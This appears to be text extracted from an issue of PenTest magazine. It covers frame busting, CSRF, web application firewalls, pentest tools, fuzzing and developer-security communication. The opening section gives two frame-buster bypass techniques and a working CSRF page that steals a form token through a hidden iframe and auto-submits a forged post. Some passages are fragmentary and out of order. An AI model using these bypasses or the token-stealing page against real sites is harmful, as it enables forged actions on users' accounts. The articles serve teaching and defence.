top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1
<script>
window.onbeforeunload = function() {
  return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:
<iframe src="second.html"></iframe>
second.html:
<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
  document.documentElement.style.display = 'block';
} else {
  top.location = self.location;
}
</script>
This protects the web application even if the page is loaded in a browser with JavaScript disabled, because the content then simply remains hidden.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then began seriously learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
bull Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
bull Same Origin Policy
bull FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack
<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" >
<input type="hidden" name="token" value="" >
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.
In most commercial and non-commercial areas, the internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and working lives. In order to facilitate all of these processes, a broad range of applications is required that are provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify, accelerate and make business processes more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how extensive their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems that follow on, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications, one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of new technology and the securing of the new technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
bull All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
bull Cross Site Scripting (XSS)
bull Hidden Field Tampering
bull Parameter Tampering
bull Cookie Poisoning
bull Buffer Overflow
bull Forceful Browsing
bull Unauthorized access to web servers
bull Search Engine Poisoning
bull Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to achieve even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions in an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then making deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use just the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten that other systems are put at risk by the unsecured application. A risk analysis can bring clarity on whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the original developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. There is no software program that ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority. The more securely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALFs) or Application-Level Gateways (ALGs). In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory; they actually complement each other. Analogous to flight traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused for SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis. That would lead to misjudging the achieved security status: filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, WAFs filter the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can also be checked this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
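The kind of parameter rule described here can be pictured as a small validator: each monitored form field gets a maximum length and a permitted character class, and requests carrying undeclared parameters are rejected. A simplified JavaScript sketch (the rule shapes and names are illustrative, not taken from any specific WAF product):

```javascript
// Per-parameter rules: maximum length and permitted characters.
const rules = {
  search: { maxLength: 64, allowed: /^[\w\s-]*$/ },  // free-text field
  page:   { maxLength: 4,  allowed: /^\d*$/ },       // numeric field
};

// Reject a request whose parameters are undeclared, too long,
// or contain characters outside the permitted value range.
function requestAllowed(params) {
  for (const [name, value] of Object.entries(params)) {
    const rule = rules[name];
    if (!rule) return false;                       // undeclared parameter
    if (value.length > rule.maxLength) return false;
    if (!rule.allowed.test(value)) return false;
  }
  return true;
}
```

A real WAF applies the same idea per protected form, which is why a request with three parameters can be blocked when only two were defined.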
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or brute-force attacks. Furthermore, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar; a virus scanner integrated into the WAF checks every file before it is sent to the web application.
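The access-rate rule mentioned here amounts to a per-client request counter over a time window. A minimal JavaScript sketch of such a sliding-window limiter (the constants and function names are illustrative, not from any WAF product):

```javascript
const WINDOW_MS = 60000; // 1-minute window (illustrative value)
const LIMIT = 100;       // max requests per window per client

const hits = new Map();  // client IP -> timestamps of recent requests

// Allow a request only if the client stayed under LIMIT requests
// within the last WINDOW_MS milliseconds; otherwise reject it.
function allowRequest(ip, now) {
  const seen = (hits.get(ip) || []).filter(t => now - t < WINDOW_MS);
  if (seen.length >= LIMIT) { hits.set(ip, seen); return false; }
  seen.push(now);
  hits.set(ip, seen);
  return true;
}
```

A production limiter would use a more memory-efficient counter, but the principle is the same one the WAF applies against Denial of Service and brute-force attempts.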
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. These filters can thus, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning if there are any changes to the application. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution should rely on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags entries to the administrator that violate the policies but can still be categorized as legitimate based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode, the WAF is used as an in-line Bridge Path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Certain special functions are only available in this mode: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without making changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization.

Figure 3: A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult

Cloaking, the concealment of one's own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured correctly for the respective environment; penetration tests help with the correct configuration.
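The URL-cloaking idea can be sketched as follows; the public paths and backend addresses are invented for illustration, and a real WAF performs this at the proxy layer rather than in application code:

```ruby
# Toy sketch of reverse-proxy URL rewriting: public paths are mapped to
# hidden backend URLs so the real infrastructure stays cloaked.
# The mapping and addresses below are hypothetical.

REWRITE_MAP = {
  %r{\A/shop/} => "http://10.0.0.12:8080/legacy-cart/",
  %r{\A/news/} => "http://10.0.0.13:8080/cms/articles/"
}.freeze

def rewrite(public_path)
  REWRITE_MAP.each do |pattern, backend|
    return public_path.sub(pattern, backend) if public_path =~ pattern
  end
  nil # no mapping: refuse rather than expose the backend
end
```

A client only ever sees `/shop/...`; the backend host, port and real path never appear in responses.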
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.

Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the frontline, certain test criteria should be applied to it as well. These include, in particular, identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or the use of the web application; all other privileges are blocked. A general integration of the WAF with Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions are intuitive, clearly displayed, and easy to understand and set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on the known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot compensate for. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's Web application security and application delivery product lines. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest magazine:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WEB APP SECURITY
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that can be configured is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, with clear explanations of the probes performed during the penetration testing.
• License Flexibility – A tool that can be used without specific constraints, such as a particular range of IP numbers or license limits, is better than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data that is sent by the browser can never be trusted (e.g., submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – To avoid Cross-Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from its own web form, it is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow some guidelines for hardening the web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
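To make the first guideline concrete, here is a minimal Ruby sketch of the two classic halves of input handling: allowlist validation on the way in, and HTML escaping on the way out. The username rule is an arbitrary example, not a recommendation:

```ruby
require "cgi"

# Sketch of input sanitization, assuming a hypothetical form handler.

def safe_username(raw)
  # Allowlist validation: accept only 3-20 word characters, reject the rest.
  raise ArgumentError, "invalid username" unless raw =~ /\A\w{3,20}\z/
  raw
end

def render_comment(text)
  # Output encoding: neutralize HTML so injected markup is displayed, not run.
  CGI.escapeHTML(text)
end
```

Validation rejects malformed input outright, while escaping ensures that anything echoed back to the browser cannot execute as script.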
In addition to the above guidelines, it is always important to enforce strong passwords for the web application's users and to protect stored passwords.
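On that last point, a minimal sketch of salted password hashing using only the Ruby standard library; the iteration count and key length are illustrative, not production guidance:

```ruby
require "openssl"
require "securerandom"

# Sketch of password storage via salted PBKDF2 (Ruby stdlib only).
ITERATIONS = 100_000 # illustrative work factor

def hash_password(password, salt = SecureRandom.hex(16))
  digest = OpenSSL::PKCS5.pbkdf2_hmac(password, salt, ITERATIONS, 32,
                                      OpenSSL::Digest.new("SHA256"))
  [salt, digest.unpack1("H*")] # store both the salt and the hex digest
end

def password_matches?(password, salt, stored_hex)
  hash_password(password, salt).last == stored_hex
end
```

Storing a salted, slow hash instead of the password itself means a leaked database does not directly yield user credentials.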
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system, determining whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue, over time, to reduce both the uncertainty of determination (i.e., false positive results) and the potential to miss some issues (i.e., false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, the automated tools can't entirely replace manual penetration testing. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, in particular for the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will go from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the chances of using automated tools rather than relying on humans to manually test these applications. Also, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution, which is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in the software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing. In QA you rarely have much time for testing and therefore need to run tests fast; sometimes you can use more time in testing and select other test completion criteria. The user must also have control over the fuzzing parameters, such as test coverage.
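To contrast with the model-based approach recommended above, here is a toy mutation fuzzer in Ruby; the "target" is a deliberately fragile stand-in function invented for this sketch, and a real fuzzer would of course drive actual software and record the crashing inputs:

```ruby
# Toy mutation-based fuzzing sketch: flip random bytes in a valid sample
# input and feed it to a target. The target here is a made-up fragile
# parser standing in for real software under test.

def mutate(sample, flips = 3)
  bytes = sample.bytes
  flips.times { bytes[rand(bytes.size)] = rand(256) }
  bytes.pack("C*")
end

def fragile_parse(data)
  # Stand-in target: "crashes" (raises) on unexpected control bytes.
  raise "crash" if data.bytes.any? { |b| b < 9 }
  data.length
end

def fuzz(sample, rounds = 1000)
  crashes = 0
  rounds.times do
    begin
      fragile_parse(mutate(sample))
    rescue RuntimeError
      crashes += 1 # a real fuzzer would save the input for reproduction
    end
  end
  crashes
end
```

Even this crude random mutation finds the "crash" eventually, which is exactly the sidebar's point: random fuzzing gives some results, but model-based test cases reach deep protocol states far more efficiently.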
Application Security members are considered like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little of everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this online, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom: for example, the report might have statements like a SQL injection is possible, not the real root cause – a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys from Mars

We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem is when the two groups talk to each other at the end of the whole process and use a non-common-ground language that further confuses or annoys everyone and pushes the groups even further apart.

Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information with which developers can pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.

Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. Developers want to know the module, class or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production on schedule.

Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved in two ways:

• Create a development framework that has security built into it
• Design an API to be used by the application

Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit the secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). Within the Java programming language community there are a lot of non-standardized frameworks available for Java developers, but which is the right one to use to ensure secure code development?

.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is therefore not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.

The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach that I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: as part of the WAPT (web application penetration test) activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code should deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it will mean your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.

In the next article we will see how to write some security tests using the BDD approach in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
